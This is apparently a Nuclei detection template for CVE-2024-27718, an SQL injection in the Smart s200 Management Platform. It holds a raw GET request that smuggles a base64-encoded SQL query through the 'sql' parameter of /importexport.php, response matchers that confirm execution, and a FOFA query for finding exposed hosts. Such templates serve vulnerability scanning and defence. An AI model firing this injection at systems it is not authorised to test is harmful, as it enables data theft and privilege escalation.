id: CVE-2024-27718

info:
  name: Smart s200 Management Platform v.S200 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.
  reference:
    - https://github.com/tldjgggg/cve/blob/main/sql.md
  classification:
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Smart管理平台"
  tags: cve,cve2024,smart-s45f,sqli

variables:
  num: "{{rand_int(9000000, 9999999)}}"
  cmd: "select+9,md5({{num}}),9"

http:
  - raw:
      - |
        GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"

      - type: word
        part: header
        words:
          - 'application/octet-stream'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ac317e1ecec2053960700ee389482ef23a2def68d0857dd2aa34ba292cf1fb3002200757a4af78313e507aeb9991d18c8cddb5f78341f409ec91f18298c3bf3eec3d:922c64590222798bb761d5b6d8e72950